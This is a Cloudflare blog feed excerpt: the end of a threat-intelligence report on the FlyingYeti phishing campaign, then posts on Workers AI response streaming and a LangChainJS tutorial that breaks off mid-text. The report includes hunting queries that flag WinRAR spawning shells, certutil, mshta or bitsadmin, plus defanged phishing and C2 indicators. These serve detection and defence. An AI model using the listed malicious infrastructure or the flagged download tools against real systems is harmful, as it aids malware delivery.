    <td><span>Cloudforce One creates a detection to identify the Worker that fetches the RAR</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 21:13</span></td>
    <td><span>Cloudforce One deploys real-time monitoring of the RAR file on GitHub</span></td>
  </tr>
  <tr>
    <td><span>2024-05-02 06:35</span></td>
    <td><span>TA deploys a weaponized RAR (CVE-2023-38831) to GitHub with their COOKBOX malware packaged in the archive</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 10:03</span></td>
    <td><span>TA attempts to update the Worker with link to weaponized RAR, the Worker is immediately blocked</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 10:38</span></td>
    <td><span>TA creates a new Worker, the Worker is immediately blocked</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 11:04</span></td>
    <td><span>TA creates a new account (#2) on Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 11:06</span></td>
    <td><span>TA creates a new Worker on account #2 (blocked)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 11:50</span></td>
    <td><span>TA creates a new Worker on account #2 (blocked)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 12:22</span></td>
    <td><span>TA creates a new modified Worker on account #2</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 16:05</span></td>
    <td><span>Cloudforce One disables the running Worker on account #2</span></td>
  </tr>
  <tr>
    <td><span>2024-05-07 22:16</span></td>
    <td><span>TA notices the Worker is blocked, ceases all operations</span></td>
  </tr>
  <tr>
    <td><span>2024-05-07 22:18</span></td>
    <td><span>TA deletes original Worker first created to fetch the RAR file from the GitHub phishing page</span></td>
  </tr>
  <tr>
    <td><span>2024-05-09 19:28</span></td>
    <td><span>Cloudforce One adds phishing page komunalka[.]github[.]io to real-time monitoring</span></td>
  </tr>
  <tr>
    <td><span>2024-05-13 07:36</span></td>
    <td><span>TA updates the github.io phishing site to point directly to the GitHub RAR link</span></td>
  </tr>
  <tr>
    <td><span>2024-05-13 17:47</span></td>
    <td><span>Cloudforce One adds COOKBOX C2 postdock[.]serveftp[.]com to real-time monitoring for DNS resolution</span></td>
  </tr>
  <tr>
    <td><span>2024-05-14 00:04</span></td>
    <td><span>Cloudforce One notifies GitHub to take down the RAR file</span></td>
  </tr>
  <tr>
    <td><span>2024-05-15 09:00</span></td>
    <td><span>GitHub user, project, and link for RAR are no longer accessible</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 08:23</span></td>
    <td><span>TA updates Komunalka phishing site on github.io to link to pixeldrain URL for dummy payload (pixeldrain only tracks view and download counts)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 08:25</span></td>
    <td><span>TA updates Komunalka phishing site to link to FileMail URL for dummy payload (FileMail tracks not only view and download counts, but also IP addresses)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 12:21</span></td>
    <td><span>Cloudforce One downloads PixelDrain document to evaluate payload</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 12:47</span></td>
    <td><span>Cloudforce One downloads FileMail document to evaluate payload</span></td>
  </tr>
  <tr>
    <td><span>2024-05-29 23:59</span></td>
    <td><span>GitHub takes down Komunalka phishing site</span></td>
  </tr>
  <tr>
    <td><span>2024-05-30 13:00</span></td>
    <td><span>Cloudforce One publishes the results of this investigation</span></td>
  </tr>
</tbody></table></div>
    <div>
      <h2>Coordinating our FlyingYeti response</h2>
      <a href="#coordinating-our-flyingyeti-response">
        
      </a>
    </div>
    <p>Cloudforce One leveraged industry relationships to provide advanced warning and to mitigate the actor’s activity. To further protect the intended targets from this phishing threat, Cloudforce One notified and collaborated closely with GitHub’s Threat Intelligence and Trust and Safety Teams. We also notified CERT-UA and Cloudflare industry partners such as CrowdStrike, Mandiant/Google Threat Intelligence, and Microsoft Threat Intelligence.</p>
    <div>
      <h3>Hunting FlyingYeti operations</h3>
      <a href="#hunting-flyingyeti-operations">
        
      </a>
    </div>
    <p>There are several ways to hunt FlyingYeti in your environment. These include using PowerShell to hunt for WinRAR files, deploying Microsoft Sentinel analytics rules, and running Splunk scripts as detailed below. Note that these detections may identify activity related to this threat, but may also match unrelated activity.</p>
    <div>
      <h3>PowerShell hunting</h3>
      <a href="#powershell-hunting">
        
      </a>
    </div>
    <p>Consider running a PowerShell script such as <a href="https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT/blob/main/hunt-script.ps1">this one</a> in your environment to identify exploitation of CVE-2023-38831. This script will interrogate WinRAR files for evidence of the exploit.</p>
            <pre><code># CVE-2023-38831
# Description: WinRAR exploit detection
# Open a suspicious archive (.tar / .zip / .rar) and run this script to check it

function winrar-exploit-detect(){
$targetExtensions = @(".cmd" , ".ps1" , ".bat")
$tempDir = [System.Environment]::GetEnvironmentVariable("TEMP")
$dirsToCheck = Get-ChildItem -Path $tempDir -Directory -Filter "Rar*"
foreach ($dir in $dirsToCheck) {
    $files = Get-ChildItem -Path $dir.FullName -File
    foreach ($file in $files) {
        $fileName = $file.Name
        $fileExtension = [System.IO.Path]::GetExtension($fileName)
        if ($targetExtensions -contains $fileExtension) {
            # Trim trailing whitespace and a trailing dot to recover the decoy file name
            $fileWithoutExtension = ([System.IO.Path]::GetFileNameWithoutExtension($fileName)).TrimEnd() -replace '\.$'
            $cmdFileName = $fileWithoutExtension
            $secondFile = Join-Path -Path $dir.FullName -ChildPath $cmdFileName
            
            if (Test-Path $secondFile -PathType Leaf) {
                Write-Host "[!] Suspicious pair detected "
                Write-Host "[*]  Original File:$($secondFile)" -ForegroundColor Green 
                Write-Host "[*] Suspicious File:$($file.FullName)" -ForegroundColor Red

                # Read and display the content of the command file
                $cmdFileContent = Get-Content -Path $($file.FullName)
                Write-Host "[+] Command File Content:$cmdFileContent"
            }
        }
    }
}
}
winrar-exploit-detect</code></pre>
            
    <div>
      <h3>Microsoft Sentinel</h3>
      <a href="#microsoft-sentinel">
        
      </a>
    </div>
    <p>In Microsoft Sentinel, consider deploying the rule provided below, which identifies WinRAR execution via cmd.exe. Results generated by this rule may be indicative of attack activity on the endpoint and should be analyzed.</p>
            <pre><code>DeviceProcessEvents
| where InitiatingProcessParentFileName has @"winrar.exe"
| where InitiatingProcessFileName has @"cmd.exe"
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName
| sort by Timestamp desc</code></pre>
            
    <div>
      <h3>Splunk</h3>
      <a href="#splunk">
        
      </a>
    </div>
    <p>Consider using <a href="https://research.splunk.com/endpoint/d2f36034-37fa-4bd4-8801-26807c15540f/">this script</a> in your Splunk environment to look for WinRAR CVE-2023-38831 execution on your Microsoft endpoints. Results generated by this script may be indicative of attack activity on the endpoint and should be analyzed.</p>
            <pre><code>| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winrar.exe `windows_shells` OR Processes.process_name IN ("certutil.exe","mshta.exe","bitsadmin.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id 
| `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `winrar_spawning_shell_application_filter`</code></pre>
            
    <div>
      <h2>Cloudflare product detections</h2>
      <a href="#cloudflare-product-detections">
        
      </a>
    </div>
    
    <div>
      <h3>Cloudflare Email Security</h3>
      <a href="#cloudflare-email-security">
        
      </a>
    </div>
    <p>Cloudflare Email Security (CES) customers can identify FlyingYeti threat activity with the following detections.</p><ul><li><p>CVE-2023-38831</p></li><li><p>FLYINGYETI.COOKBOX</p></li><li><p>FLYINGYETI.COOKBOX.Launcher</p></li><li><p>FLYINGYETI.Rar</p></li></ul>
    <div>
      <h2>Recommendations</h2>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>Cloudflare recommends taking the following steps to mitigate this type of activity:</p><ul><li><p>Implement Zero Trust architecture foundations:</p><ul><li><p>Deploy Cloud Email Security to ensure that email services are protected against phishing, BEC, and other threats</p></li><li><p>Leverage browser isolation to separate messaging applications like LinkedIn, email, and Signal from your main network</p></li><li><p>Scan, monitor, and/or enforce controls on specific or sensitive data moving through your network environment with data loss prevention policies</p></li></ul></li><li><p>Ensure your systems have the latest WinRAR and Microsoft security updates installed</p></li><li><p>Consider preventing WinRAR files from entering your environment, both at your Cloud Email Security solution and your Internet Traffic Gateway</p></li><li><p>Run an Endpoint Detection and Response (EDR) tool such as CrowdStrike or Microsoft Defender for Endpoint to get visibility into binary execution on hosts</p></li><li><p>Search your environment for the FlyingYeti indicators of compromise (IOCs) shown below to identify potential actor activity within your network</p></li></ul><p>If you’re looking to uncover additional Threat Intelligence insights for your organization or need bespoke Threat Intelligence information for an incident, consider engaging with Cloudforce One by contacting your Customer Success manager or filling out <a href="https://www.cloudflare.com/zero-trust/lp/cloudforce-one-threat-intel-subscription/">this form</a>.</p>
    <div>
      <h2>Indicators of Compromise</h2>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    
<div><table><colgroup>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Domain / URL</span></th>
    <th><span>Description</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>komunalka[.]github[.]io</span></td>
    <td><span>Phishing page</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//github[.]com/komunalka/komunalka[.]github[.]io</span></td>
    <td><span>Phishing page</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//worker-polished-union-f396[.]vqu89698[.]workers[.]dev</span></td>
    <td><span>Worker that fetches malicious RAR file</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//raw[.]githubusercontent[.]com/kudoc8989/project/main/Заборгованість по ЖКП.rar</span></td>
    <td><span>Delivery of malicious RAR file</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//1014[.]filemail[.]com/api/file/get?filekey=e_8S1HEnM5Rzhy_jpN6nL-GF4UAP533VrXzgXjxH1GzbVQZvmpFzrFA&amp;pk_vid=a3d82455433c8ad11715865826cf18f6</span></td>
    <td><span>Dummy payload</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//pixeldrain[.]com/api/file/ZAJxwFFX?download=</span></td>
    <td><span>Dummy payload</span></td>
  </tr>
  <tr>
    <td><span>hxxp[:]//canarytokens[.]com/stuff/tags/ni1cknk2yq3xfcw2al3efs37m/payments.js</span></td>
    <td><span>Tracking link</span></td>
  </tr>
  <tr>
    <td><span>hxxp[:]//canarytokens[.]com/stuff/terms/images/k22r2dnjrvjsme8680ojf5ccs/index.html</span></td>
    <td><span>Tracking link</span></td>
  </tr>
  <tr>
    <td><span>postdock[.]serveftp[.]com</span></td>
    <td><span>COOKBOX C2</span></td>
  </tr>
</tbody></table></div> ]]></content:encoded>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Cloudforce One]]></category>
            <category><![CDATA[CVE]]></category>
            <category><![CDATA[Exploit]]></category>
            <category><![CDATA[GitHub]]></category>
            <category><![CDATA[Intrusion Detection]]></category>
            <category><![CDATA[Malware]]></category>
            <category><![CDATA[Microsoft]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Remote Browser Isolation]]></category>
            <category><![CDATA[Russia]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Threat Data]]></category>
            <category><![CDATA[Threat Intelligence]]></category>
            <category><![CDATA[Threat Operations]]></category>
            <category><![CDATA[Ukraine]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">5JO10nXN3tLVG2C1EttkiH</guid>
            <dc:creator>Cloudforce One</dc:creator>
        </item>
        <item>
            <title><![CDATA[Streaming and longer context lengths for LLMs on Workers AI]]></title>
            <link>https://blog.cloudflare.com/workers-ai-streaming/</link>
            <pubDate>Tue, 14 Nov 2023 14:00:33 GMT</pubDate>
            <description><![CDATA[ Workers AI now supports streaming text responses for the LLM models in our catalog, including Llama-2, using server-sent events ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6hqH5G1qi0RIrmIsdkb1Ql/0d7746c5af2fe23d347ef7192d868b36/pasted-image-0--3--2.png" />
            
            </figure><p>Workers AI is our serverless GPU-powered inference platform running on top of Cloudflare’s global network. It provides a growing catalog of off-the-shelf models that run seamlessly with Workers and enable developers to build powerful and scalable AI applications in minutes. We’ve already seen developers doing amazing things with Workers AI, and we can’t wait to see what they do as we continue to expand the platform. To that end, today we’re excited to announce some of our most-requested new features: streaming responses for all <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">Large Language Models</a> (LLMs) on Workers AI, larger context and sequence windows, and a full-precision <a href="https://developers.cloudflare.com/workers-ai/models/llm/">Llama-2</a> model variant.</p><p>If you’ve used ChatGPT before, then you’re familiar with the benefits of response streaming, where responses flow in token by token. LLMs work internally by generating responses sequentially using a process of repeated inference — the full output of an LLM is essentially a sequence of hundreds or thousands of individual prediction tasks. For this reason, while it only takes a few milliseconds to generate a single token, generating the full response takes longer, on the order of seconds. The good news is we can start displaying the response as soon as the first tokens are generated, and append each additional token until the response is complete. This yields a much better experience for the end user — displaying text incrementally as it's generated not only provides instant responsiveness, but also gives the end-user time to read and interpret the text.</p><p>As of today, you can now use response streaming for any LLM in our catalog, including the very popular <a href="https://developers.cloudflare.com/workers-ai/models/llm/">Llama-2 model</a>. Here’s how it works.</p>
    <div>
      <h3>Server-sent events: a little gem in the browser API</h3>
      <a href="#server-sent-events-a-little-gem-in-the-browser-api">
        
      </a>
    </div>
    <p><a href="https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events/Using_server-sent_events">Server-sent events</a> are easy to use, simple to implement on the server side, standardized, and broadly available across many platforms natively or as a polyfill. Server-sent events fill a niche of handling a stream of updates from the server, removing the need for the boilerplate code that would otherwise be necessary to handle the event stream.</p>
<table>
<thead>
  <tr>
    <th></th>
    <th><span>Easy-to-use</span></th>
    <th><span>Streaming</span></th>
    <th><span>Bidirectional</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>fetch</span></td>
    <td><span>✅</span></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Server-sent events</span></td>
    <td><span>✅</span></td>
    <td><span>✅</span></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Websockets</span></td>
    <td></td>
    <td><span>✅</span></td>
    <td><span>✅</span></td>
  </tr>
</tbody>
</table><p><sup>Comparing fetch, server-sent events, and websockets</sup></p><p>To get started using streaming on Workers AI’s text generation models with server-sent events, set the “stream” parameter to true in the input of the request. This will change the response format and <code>mime-type</code> to <code>text/event-stream</code>.</p><p>Here’s an example of using streaming with the <a href="https://developers.cloudflare.com/workers-ai/get-started/rest-api/">REST API</a>:</p>
            <pre><code>curl -X POST \
"https://api.cloudflare.com/client/v4/accounts/&lt;account&gt;/ai/run/@cf/meta/llama-2-7b-chat-int8" \
-H "Authorization: Bearer &lt;token&gt;" \
-H "Content-Type:application/json" \
-d '{ "prompt": "where is new york?", "stream": true }'

data: {"response":"New"}

data: {"response":" York"}

data: {"response":" is"}

data: {"response":" located"}

data: {"response":" in"}

data: {"response":" the"}

...

data: [DONE]</code></pre>
            <p>And here’s an example using a Worker script:</p>
            <pre><code>import { Ai } from "@cloudflare/ai";
export default {
    async fetch(request, env, ctx) {
        const ai = new Ai(env.AI, { sessionOptions: { ctx: ctx } });
        const stream = await ai.run(
            "@cf/meta/llama-2-7b-chat-int8",
            { prompt: "where is new york?", stream: true  }
        );
        return new Response(stream,
            { headers: { "content-type": "text/event-stream" } }
        );
    }
}</code></pre>
            <p>If you want to consume the output event-stream from this Worker in a browser page, the client-side JavaScript is something like:</p>
            <pre><code>const source = new EventSource("/worker-endpoint");
source.onmessage = (event) =&gt; {
    if(event.data=="[DONE]") {
        // SSE spec says the connection is restarted
        // if we don't explicitly close it
        source.close();
        return;
    }
    const data = JSON.parse(event.data);
    // "el" is the DOM element where the streamed response is displayed
    el.innerHTML += data.response;
}</code></pre>
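            <p>Note that <code>EventSource</code> only issues GET requests, so it works when the Worker endpoint streams on GET. If your endpoint expects a POST body, a common alternative is to read the <code>text/event-stream</code> response with <code>fetch</code> and parse the <code>data:</code> lines yourself. Here is a minimal parser sketch (the helper name <code>parseSSEChunk</code> is hypothetical, not part of any API):</p>

```javascript
// Parse a chunk of a text/event-stream body into the JSON payloads carried
// by its "data:" lines. "[DONE]" marks the end of the stream.
// Illustrative sketch only -- not an official Workers AI or browser API.
function parseSSEChunk(chunk) {
  const tokens = [];
  let done = false;
  for (const line of chunk.split("\n")) {
    if (!line.startsWith("data: ")) continue; // skip blank lines and comments
    const payload = line.slice("data: ".length);
    if (payload === "[DONE]") { done = true; break; }
    tokens.push(JSON.parse(payload).response);
  }
  return { tokens, done };
}

// Example: the first few events from the curl output above
const chunk = 'data: {"response":"New"}\n\ndata: {"response":" York"}\n\ndata: [DONE]\n';
const { tokens, done } = parseSSEChunk(chunk);
console.log(tokens.join(""), done); // "New York" true
```

            <p>In a real client you would feed each decoded chunk from the response body's reader through a parser like this, buffering any partial line until the next chunk arrives.</p>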
            <p>You can use this code with any simple HTML page, or with complex SPAs built with React or other web frameworks.</p><p>This creates a much more interactive experience for the user, who now sees the page update as the response is incrementally created, instead of waiting with a spinner until the entire response sequence has been generated. Try out streaming on <a href="https://ai.cloudflare.com">ai.cloudflare.com</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6VIIO6crNIkpaz8hG9n8jg/c703ab696213d0fa814aff31d6d36d09/llama-streaming.gif" />
            
            </figure><p>Workers AI supports streaming text responses for the <a href="https://developers.cloudflare.com/workers-ai/models/llm/">Llama-2</a> model and any future LLM models we are adding to our catalog.</p><p>But this is not all.</p>
    <div>
      <h3>Higher precision, longer context and sequence lengths</h3>
      <a href="#higher-precision-longer-context-and-sequence-lengths">
        
      </a>
    </div>
    <p>Another top request we heard from our community after the launch of Workers AI was for longer questions and answers in our Llama-2 model. In LLM terminology, this translates to higher context length (the number of tokens the model takes as input before making the prediction) and higher sequence length (the number of tokens the model generates in the response).</p><p>We’re listening, and in conjunction with streaming, today we are adding a higher 16-bit full-precision Llama-2 variant to the catalog, and increasing the context and sequence lengths for the existing 8-bit version.</p>
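    <p>As a rough sketch of what a context limit means in practice, you can estimate whether a prompt will fit before sending it. The 4-characters-per-token ratio below is a common heuristic assumed for illustration, not the model's actual tokenizer:</p>

```javascript
// Rough, illustrative check that a prompt fits a model's context window.
// The 4-chars-per-token ratio is a heuristic, NOT the real tokenizer.
const CONTEXT_LIMITS = {
  "@cf/meta/llama-2-7b-chat-int8": 2048,
  "@cf/meta/llama-2-7b-chat-fp16": 3072,
};

function estimateTokens(text) {
  return Math.ceil(text.length / 4);
}

function fitsContext(model, prompt) {
  return estimateTokens(prompt) <= CONTEXT_LIMITS[model];
}

console.log(fitsContext("@cf/meta/llama-2-7b-chat-int8", "where is new york?")); // true
```

    <p>For accurate counts you would use the model's own tokenizer; this sketch only shows why the input and output budgets in the table below matter.</p>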
<table>
<thead>
  <tr>
    <th><span>Model</span></th>
    <th><span>Context length (in)</span></th>
    <th><span>Sequence length (out)</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>@cf/meta/llama-2-7b-chat-int8</span></td>
    <td><span>2048 (768 before)</span></td>
    <td><span>1800 (256 before)</span></td>
  </tr>
  <tr>
    <td><span>@cf/meta/llama-2-7b-chat-fp16</span></td>
    <td><span>3072</span></td>
    <td><span>2500</span></td>
  </tr>
</tbody>
</table><p>Streaming, higher precision, and longer context and sequence lengths provide a better user experience and enable new, richer applications using large language models in Workers AI.</p><p>Check the Workers AI <a href="https://developers.cloudflare.com/workers-ai">developer documentation</a> for more information and options. If you have any questions or feedback about Workers AI, please come see us in the <a href="https://community.cloudflare.com/">Cloudflare Community</a> and the <a href="https://discord.gg/cloudflaredev">Cloudflare Discord</a>. If you are interested in machine learning and serverless AI, the Cloudflare Workers AI team is building a global-scale platform and tools that enable our customers to run fast, low-latency inference tasks on top of our network. Check our <a href="https://www.cloudflare.com/careers/jobs/">jobs page</a> for opportunities.</p> ]]></content:encoded>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <guid isPermaLink="false">4RWvzttPkO6JoYsMwoovJ8</guid>
            <dc:creator>Jesse Kipp</dc:creator>
            <dc:creator>Celso Martinho</dc:creator>
        </item>
        <item>
            <title><![CDATA[Using LangChainJS and Cloudflare Workers together]]></title>
            <link>https://blog.cloudflare.com/langchain-and-cloudflare/</link>
            <pubDate>Thu, 18 May 2023 13:00:18 GMT</pubDate>
            <description><![CDATA[ We are incredibly stoked that our friends at LangChain have announced LangChainJS Support for Cloudflare Workers! In this post we'll show you how to build a sample application. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>We are incredibly stoked that our friends at LangChain have announced <a href="https://blog.langchain.dev/js-envs/">LangChainJS Support for Multiple JavaScript Environments (including Cloudflare Workers)</a>. During Developer Week 2023 we wanted to celebrate this launch and our future collaborations with LangChain.</p><blockquote><p><i>“Our goal for LangChain is to empower developers around the world to build with AI. We want LangChain to work wherever developers are building, and to spark their creativity to build new and innovative applications. With this new launch, we can't wait to see what developers build with LangChainJS and Cloudflare Workers. And we're excited to put more of Cloudflare's developer tools in the hands of our community in the coming months.” - </i><b><i>Harrison Chase</i></b><i>, Co-Founder and CEO, LangChain</i></p></blockquote><p>In this post, we’ll share why we’re so excited about LangChain and walk you through how to build your first LangChainJS + Cloudflare Workers application.</p><p>For the uninitiated, <a href="https://docs.langchain.com/docs/">LangChain</a> is a framework for building applications powered by <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">large language models (LLMs)</a>. It not only lets you fairly seamlessly switch between different LLMs, but also gives you the ability to chain prompts together. This allows you to build more sophisticated applications across multiple LLMs, something that would be way more complicated without the help of LangChain.</p>
    <div>
      <h3>Building your first LangChainJS + Cloudflare Workers application</h3>
      <a href="#building-your-first-langchainjs-cloudflare-workers-application">
        
      </a>
    </div>
    <p>There are a few prerequisites you have to set up in order to build this application:</p><ol><li><p>An OpenAI account: If you don’t already have one, you can <a href="https://platform.openai.com/signup">sign up for free</a>.</p></li><li><p>A paid Cloudflare Workers account: If you don’t already have an account, you can <a href="https://dash.cloudflare.com/sign-up">sign up here</a> and upgrade your Workers plan for $5 per month.</p></li><li><p>Node &amp; npm: If this is your first time working with Node, you can <a href="https://nodejs.org/en/">get it here</a>.</p></li></ol><p>Next, create a new folder called <code>langchain-workers</code>, navigate into that folder, and then within that folder run <code>npm create cloudflare@latest</code>.</p><p>When you run <code>npm create cloudflare@latest</code> you’ll select the following options:</p><ul><li><p><b>Where do you want to create your application?</b> <i>langchain-worker</i></p></li><li><p><b>What type of application do you want to create?</b> <i>"Hello World" script</i></p></li><li><p><b>Do you want to use TypeScript?</b> <i>No</i></p></li><li><p><b>Do you want to deploy your application?</b> <i>No</i></p></li></ul><p>With our Worker created, we’ll need to set up the environment variable for our OpenAI API key. You can <a href="https://platform.openai.com/account/api-keys">create an API key in your OpenAI dashboard</a>. Save your new API key someplace safe, then we’ll use Wrangler to safely and securely store our API key in an environment variable that our Worker can access:</p>
            <pre><code>npx wrangler secret put OPENAI_API_KEY</code></pre>
            <p>Then we’ll install LangChainJS using npm:</p>
            <pre><code>npm install langchain</code></pre>
            <p>Before we start writing code we can make sure everything is working properly by running <code>wrangler dev</code>. With <code>wrangler dev</code> running you can press <code>b</code> to open a browser. When you do, you'll see “Hello World!” in your browser.</p>
    <div>
      <h3>A sample application</h3>
      <a href="#a-sample-application">
        
      </a>
    </div>
    <p>One common way you may want to use a language model is to combine it with your own text. LangChain is a great tool to accomplish this goal and that’s what we’ll be doing today in our sample application. We’re going to build an application that lets us use the OpenAI language model to ask a question about an article on Wikipedia. Because I live in (and love) Brooklyn, we’ll be using the <a href="https://en.wikipedia.org/wiki/Brooklyn">Wikipedia article about Brooklyn</a>. But you can use this code for any Wikipedia article, or website, you’d like.</p><p>Because language models only know about the data that they were trained on, if we want to use a language model with new or specific information we need a way to pass a model that information. In LangChain we can accomplish this using a <a href="https://js.langchain.com/docs/modules/schema/document">”document”</a>. If you’re like me, when you hear “document” you often think of a specific file format but in LangChain a document is an object that consists of some text and optionally some metadata. The text in a document object is what will be used when interacting with a language model and the metadata is a way that you can track information about your document.</p><p>Most often you’ll want to create documents from a source of pre-existing text. LangChain helpfully provides us with different <a href="https://js.langchain.com/docs/modules/indexes/document_loaders/">document loaders</a> to make loading text from many different sources easy. There are document loaders for different types of text formats (for example: CSV, PDFs, HTML, unstructured text) and that content can be loaded locally or from the web. A document loader will both retrieve the text for you and load that text into a document object. For our application, we’ll be using the <a href="https://js.langchain.com/docs/modules/indexes/document_loaders/examples/web_loaders/web_cheerio">webpages with Cheerio</a> document loader. 
<a href="https://cheerio.js.org/">Cheerio</a> is a lightweight library that will let us read the content of a webpage. We can install it using <code>npm install cheerio</code>.</p><p>After we’ve installed cheerio we’ll import the CheerioWebBaseLoader at the top of our <code>src/index.js</code> file:</p>
            <pre><code>import { CheerioWebBaseLoader } from "langchain/document_loaders/web/cheerio";</code></pre>
            <p>With CheerioWebBaseLoader imported, we can start using it within our fetch function:</p>
            <pre><code>    async fetch(request, env, ctx) {
        const loader = new CheerioWebBaseLoader(
          "https://en.wikipedia.org/wiki/Brooklyn"
        );
        const docs = await loader.load();
        console.log(docs);

        return new Response("Hello World!");
  },</code></pre>
            <p>In this code, we’re configuring our loader with the Wikipedia URL for the article about Brooklyn, running the <code>load()</code> function, and logging the result to the console. Like I mentioned earlier, if you want to try this with a different Wikipedia article or website, LangChain makes it very easy. All we have to do is change the URL we’re passing to our CheerioWebBaseLoader.</p><p>Let’s run <code>npx wrangler dev</code>, load up our page locally and watch the output in our console. You should see:</p>
            <pre><code>Loaded page
Array(1) [ Document ]</code></pre>
            <p>Our document loader retrieved the content of the webpage, put that content in a document object and loaded it into an array.</p>
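            <p>Conceptually, each entry in that array has the shape LangChain uses for documents: a <code>pageContent</code> string plus an optional <code>metadata</code> object. A simplified stand-in class (not the actual LangChain <code>Document</code> class) makes the shape concrete:</p>

```javascript
// Simplified stand-in for LangChain's document object: the text that will
// be sent to the language model, plus optional metadata about its origin.
// Illustrative only -- use LangChain's own Document class in real code.
class SimpleDocument {
  constructor({ pageContent, metadata = {} }) {
    this.pageContent = pageContent;
    this.metadata = metadata;
  }
}

const doc = new SimpleDocument({
  pageContent: "Brooklyn is a borough of New York City...",
  metadata: { source: "https://en.wikipedia.org/wiki/Brooklyn" },
});
console.log(doc.metadata.source); // https://en.wikipedia.org/wiki/Brooklyn
```

            <p>Keeping the source URL in the metadata is handy later, when you want to cite where an answer came from.</p>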
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6eUEj1m3fLXaX22XfWzZc1/9b080aef6c13b4bd4db31c740b2998f1/image7-8.png" />
            
            </figure><p>This is great, but there’s one more improvement we can make to this code before we move on – splitting our text into multiple documents.</p><p>Many language models have limits on the amount of text you can pass to them. As well, some LLM APIs charge based on the amount of text you send in your request. For both of these reasons, it’s helpful to only pass the text you need in a request to a language model.</p><p>Currently, we’ve loaded the entire content of the Wikipedia page about Brooklyn into one document object and would send the entirety of that text with every request to our language model. It would be more efficient if we could only send the relevant text to our language model when we have a question. The first step in doing this is to split our text into smaller chunks that are stored in multiple document objects. To assist with this LangChain gives us the very aptly named <a href="https://js.langchain.com/docs/modules/indexes/text_splitters/">Text Splitters</a>.</p><p>We can use a text splitter by updating our loader to use the <code>loadAndSplit()</code> function instead of <code>load()</code>. Update the line where we assign docs to this:</p>
            <pre><code>const docs = await loader.loadAndSplit();</code></pre>
            <p>Now start the application again with <code>npx wrangler dev</code> and load our page. This time in our console you’ll see something like this:</p>
            <pre><code>Loaded page
Array(227) [ Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document, Document... ]</code></pre>
            <p>Instead of an array with one document object, our document loader has now split the text it retrieved into multiple document objects. It’s still a single Wikipedia article, LangChain just split that text into chunks that would be more appropriately sized for working with a language model.</p>
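            <p>To see what <code>loadAndSplit()</code> is doing conceptually, here is a naive splitter sketch that chunks text by size with a little overlap. LangChain’s real text splitters are smarter about sentence and paragraph boundaries, and the sizes here are arbitrary illustration values:</p>

```javascript
// Naive fixed-size splitter with overlap, to illustrate the idea behind
// LangChain's text splitters. Real splitters respect natural boundaries
// (sentences, paragraphs) instead of cutting at arbitrary character offsets.
function splitText(text, chunkSize = 1000, overlap = 100) {
  const chunks = [];
  for (let start = 0; start < text.length; start += chunkSize - overlap) {
    chunks.push(text.slice(start, start + chunkSize));
    if (start + chunkSize >= text.length) break; // last chunk reached
  }
  return chunks;
}

const article = "a".repeat(2500); // stand-in for the Wikipedia article text
console.log(splitText(article).length); // 3
```

            <p>The overlap means neighboring chunks share some text, so a sentence cut at a boundary still appears whole in at least one chunk.</p>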
            <figure>
            
